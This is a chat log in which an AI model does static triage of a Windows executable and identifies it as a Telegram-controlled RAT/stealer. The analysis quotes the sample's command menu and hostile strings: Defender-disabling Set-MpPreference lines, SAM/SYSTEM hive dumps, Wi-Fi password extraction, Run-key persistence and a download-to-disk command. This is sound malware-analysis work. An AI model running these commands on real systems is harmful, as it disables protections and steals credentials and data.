Find suspicious strings into it is it malware or ...

Created on: May 17, 2026

Answered using GPT-5.5 Thinking by Chat01

Question

telegram_bot.exe

Find suspicious strings in it. Is it malware or what? Give me everything this file can do; give me all the important stuff this exe does.

Thought

I found a hard-coded Telegram bot token and a full command menu in the binary. This is not just a harmless bot; it has RAT/stealer behavior, including command execution, persistence, Defender tampering, credential/hash dumping, keylogging, screenshotting, and file transfer.

Thought for 1m 43s

Answer

Verdict

Yes — this is malware with high confidence.
telegram_bot.exe is a Telegram-controlled Windows RAT / stealer. I did static analysis only and did not run it.

It contains a hard-coded Telegram bot token, connects to Telegram infrastructure, exposes remote commands, and includes features for surveillance, credential theft, persistence, AV tampering, file exfiltration, command execution, and system disruption.


File identifiers

| Item | Value |
|---|---|
| Filename | telegram_bot.exe |
| Type | PE32+ Windows x64 GUI executable |
| Size | 2,437,632 bytes |
| MD5 | 6dd2dfb10d39d0a627dfa149b53b17b4 |
| SHA1 | b9b518ad5bcc1bde9ddab9e144f3f4ec49353e7f |
| SHA256 | 42a4ae66ea99cfa32316237f457c8626b5aefe5b49b66b7fd43b205f1025e0de |
| PE timestamp | Fri May 15 04:32:46 2026 |
| Likely language | Rust |
| Notable build strings | src/main.rs, /home/kali/.cargo/registry/... |

The file appears to be a Rust-built Telegram bot using crates such as teloxide, tokio, reqwest, hyper, serde, and chrono.


Most important finding

The binary contains an embedded Telegram bot token:

```text
8749312864:AAEZ...rwks
```

I redacted the middle of the token because it is effectively a live credential. Whoever controls that bot can likely issue commands to infected machines. That token should be revoked through Telegram BotFather immediately.


Command menu found inside the EXE

The malware contains this command list:

```text
/start
/screen
/clip
/wifi
/wifipass
/keylog
/stoplog
/mic
/history
/lock
/shutdown
/restart
/persist
/disableav
/sysinfo
/record
/myip
/location
/hash
/gethash
/upload <path>
/download <url>
/cmd <command>
```

This is a full remote-access command set.


What the EXE can do

Remote command execution

It supports:

```text
/cmd <command> - Execute command
```

Suspicious strings:

```text
cmd/C
Command executed (no output)
C:\Windows\System32\cmd.exe
powershell
```

This means the attacker can run arbitrary Windows commands through Telegram.


Telegram command-and-control

Found strings:

```text
https://api.telegram.org
GetMe
GetUpdates
SendMessage
Bot Activated
Failed to parse default Telegram bot API url
```

This strongly indicates the malware polls Telegram for commands and sends results back through Telegram.


Screenshot capture

Found strings:

```text
/screen - Take screenshot
screen.png
Screenshot failed
```

Also found PowerShell screenshot code using:

```text
System.Windows.Forms
System.Drawing.Bitmap
CopyFromScreen
```

So it can capture the victim’s screen and likely send the image back to Telegram.


Screen recording / repeated screenshots

Found strings:

```text
/record - Record screen (5 shots)
Recording 5 screenshots...
record_
.png
Recording complete
```

This looks like it takes 5 screenshot frames, probably saved as record_*.png.


Clipboard theft

Found strings:

```text
/clip - Get clipboard content
Get-Clipboard
Clipboard:
Clipboard is empty
```

It can read clipboard contents, which may expose passwords, crypto addresses, copied tokens, private messages, etc.


Wi-Fi profile and password theft

Found strings:

```text
/wifi - List WiFi networks
/wifipass - Extract WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="$profile" key=clear
Key Content
WiFi Passwords:
No WiFi passwords found (run as admin)
```

It tries to enumerate saved Wi-Fi profiles and extract stored Wi-Fi passwords.


Keylogging attempt

Found strings:

```text
/keylog - Start keylogger
/stoplog - Stop keylogger
C:\keylog.txt
Keylogger started. Logging to C:\keylog.txt
Keylogger stopped
taskkill /f /im powershell.exe 2>nul
```

It claims to start a keylogger and writes to:

```text
C:\keylog.txt
```

The implementation looks crude from the strings and may not be a reliable keylogger, but the intent is clearly malicious.


Browser history theft

Found strings:

```text
/history - Browser history
C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\History
Browser History:
No browser history found
```

It tries to read Chrome browser history from user profiles.


Microphone recording attempt

Found strings:

```text
/mic - Record microphone (5 sec)
audio.wav
Microphone recording failed
```

It appears to try creating an audio file named:

```text
audio.wav
```

The embedded code looks questionable, but the intended feature is microphone capture.


File exfiltration and download

Found strings:

```text
/upload <path> - Upload file
/download <url> - Download file
Invoke-WebRequest -Uri '
-OutFile C:\downloaded.exe
File downloaded to C:\downloaded.exe
File not found:
```

Capabilities:

```text
/upload <path>
```

Likely sends a chosen local file to the attacker through Telegram.

```text
/download <url>
```

Downloads attacker-supplied content to:

```text
C:\downloaded.exe
```

I did not see enough from strings alone to prove it auto-executes the downloaded file, but /cmd can be used to execute it afterward.


Persistence

Found strings:

```text
/persist - Add persistence
Persistence added to HKCU\Run\WindowsUpdate
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
WindowsUpdate
```

It likely adds itself to:

```text
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
```

under the value name:

```text
WindowsUpdate
```

That makes it start automatically when the user logs in.


Windows Defender tampering

Found strings:

```text
/disableav - Disable Defender
Windows Defender disabled (requires admin)
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableBlockAtFirstSeen $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableArchiveScanning $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Set-MpPreference -DisableScriptScanning $true
Set-MpPreference -SubmitSamplesConsent 2
```

This is very strong malware evidence. It attempts to disable multiple Microsoft Defender protections.


NTLM / Windows hash dumping

Found strings:

```text
/hash - Dump NTLM hashes
/gethash - Get NTLM hash files
NTLM hashes saved. Use /gethash to retrieve
reg save HKLM\SAM C:\sam.save
reg save HKLM\SYSTEM C:\system.save
C:\sam.save
C:\system.save
No hash files found (run /hash first)
```

This attempts to dump Windows SAM and SYSTEM registry hives, which can be used to extract local password hashes.

This usually requires admin privileges.


System information collection

Found strings:

```text
/sysinfo - System information
SYSTEM INFORMATION
Hostname:
OS:
CPU:
RAM:
User:
hostname
whoami
Get-CimInstance Win32_Processor
Get-CimInstance Win32_ComputerSystem
COMPUTERNAME
USERNAME
```

It collects host/user/system inventory.


Public IP and geolocation lookup

Found URLs:

```text
https://api.ipify.org
http://ip-api.com/json/
```

Found strings:

```text
/myip - Public IP address
/location - Geolocation info
Public IP:
Location:
City:
Region:
Country:
Lat:
Lon:
ISP:
```

It queries external services to identify the victim’s public IP, approximate location, and ISP.


Lock, reboot, and shutdown

Found strings:

```text
/lock - Lock workstation
/shutdown - Shutdown PC
/restart - Restart PC
rundll32.exe user32.dll,LockWorkStation
shutdown /r /30 /c shutdown /s
System restart initiated
System shutdown initiated
```

It can disrupt the victim’s workstation.


Network indicators

```text
https://api.telegram.org
https://api.ipify.org
http://ip-api.com/json/
```

The main C2 channel appears to be Telegram Bot API.


File/path indicators

```text
C:\downloaded.exe
C:\keylog.txt
C:\sam.save
C:\system.save
screen.png
audio.wav
record_*.png
```

Registry persistence indicator:

```text
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
```

Suspicious imported APIs

The import table includes capabilities consistent with process execution, networking, file access, registry access, and TLS:

```text
CreateProcessW
CreateThread
CreateFileW
DeleteFileW
ReadFile
WriteFileEx
GetEnvironmentVariableW
RegOpenKeyExW
RegQueryValueExW
connect
send
recv
getaddrinfo
crypt32.dll certificate functions
secur32.dll TLS/security functions
```

No obvious UPX packing was found. Entropy is moderate, so it does not look heavily packed.


Bottom line

This is not a normal Telegram bot. It is a Telegram RAT / stealer with these major capabilities:

```text
Remote shell
Telegram C2
Screenshot capture
Clipboard theft
Wi-Fi password extraction
Browser history theft
File upload/exfiltration
File download
Persistence through HKCU Run
Windows Defender disabling
NTLM/SAM/SYSTEM hive dumping
Public IP and location lookup
System info collection
Lock/reboot/shutdown
Keylogging attempt
Microphone recording attempt
```

Do not run it. If it already ran on a machine, assume that machine is compromised. Disconnect it from the network, revoke the Telegram bot token, check the Run key for WindowsUpdate, collect the hashes above for detection, rotate passwords, and run a full offline/EDR scan.
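The string-based triage the answer above describes (capability strings, hard-coded Telegram token, redaction of the token for reporting) can be reproduced as a small static scanner. This is an added example, not code from the original answer or from the analysed binary; the indicator list is taken from the strings quoted above, the Telegram token length bounds are an assumption, and the sample blob is constructed with a fake token.

```python
import re
from typing import Dict, List

# Capability indicators taken from the strings reported in the analysis above.
CAPABILITIES: Dict[str, List[str]] = {
    "telegram_c2": ["api.telegram.org", "GetUpdates", "SendMessage"],
    "remote_shell": ["/cmd <command>", "C:\\Windows\\System32\\cmd.exe"],
    "defender_tampering": ["Set-MpPreference -Disable"],
    "hive_dumping": ["reg save HKLM\\SAM", "reg save HKLM\\SYSTEM"],
    "persistence": ["CurrentVersion\\Run", "HKCU\\Run\\WindowsUpdate"],
    "wifi_theft": ["netsh wlan show profile", "key=clear"],
    "keylogging": ["C:\\keylog.txt"],
    "geolocation": ["ip-api.com/json", "api.ipify.org"],
}
# Printable ASCII runs of 6+ bytes, the same idea as the `strings` tool.
STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")
# Telegram bot tokens are <numeric bot id>:<35 URL-safe chars>; the length
# bounds here are an assumption based on the documented token format.
TOKEN_RE = re.compile(rb"(?<![A-Za-z0-9_-])\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")

def extract_strings(blob: bytes) -> List[str]:
    return [m.group().decode("ascii") for m in STRING_RE.finditer(blob)]

def redact_token(token: str) -> str:
    # Keep the bot id and the edges of the secret, as the analysis above does,
    # so the value stays recognisable in a report without being reusable.
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}...{secret[-4:]}"

def triage(blob: bytes) -> dict:
    strings = extract_strings(blob)
    hits = {cap: [s for s in strings if any(ind in s for ind in inds)]
            for cap, inds in CAPABILITIES.items()}
    hits = {cap: matched for cap, matched in hits.items() if matched}
    tokens = [redact_token(m.group().decode("ascii")) for m in TOKEN_RE.finditer(blob)]
    # Several distinct RAT capabilities, or an embedded C2 credential, is enough to escalate.
    verdict = "likely RAT/stealer" if tokens or len(hits) >= 3 else "inconclusive"
    return {"capabilities": sorted(hits), "matched_strings": hits,
            "bot_tokens": tokens, "verdict": verdict}

# Constructed stand-in for a binary: NUL-separated strings, including a fake token.
SAMPLE_BLOB = b"\x00".join([
    b"https://api.telegram.org",
    b"1234567890:ABCD" + b"X" * 27 + b"WXYZ",  # fake token, not a real credential
    b"/cmd <command> - Execute command",
    b"Set-MpPreference -DisableRealtimeMonitoring $true",
    b"reg save HKLM\\SAM C:\\sam.save",
    b"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
])
```

Run `triage(open("sample.exe", "rb").read())` on a real file to get the matched capability strings and a redacted token list suitable for a report; the verdict threshold is deliberately crude and is a prompt for manual review, not a classifier.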
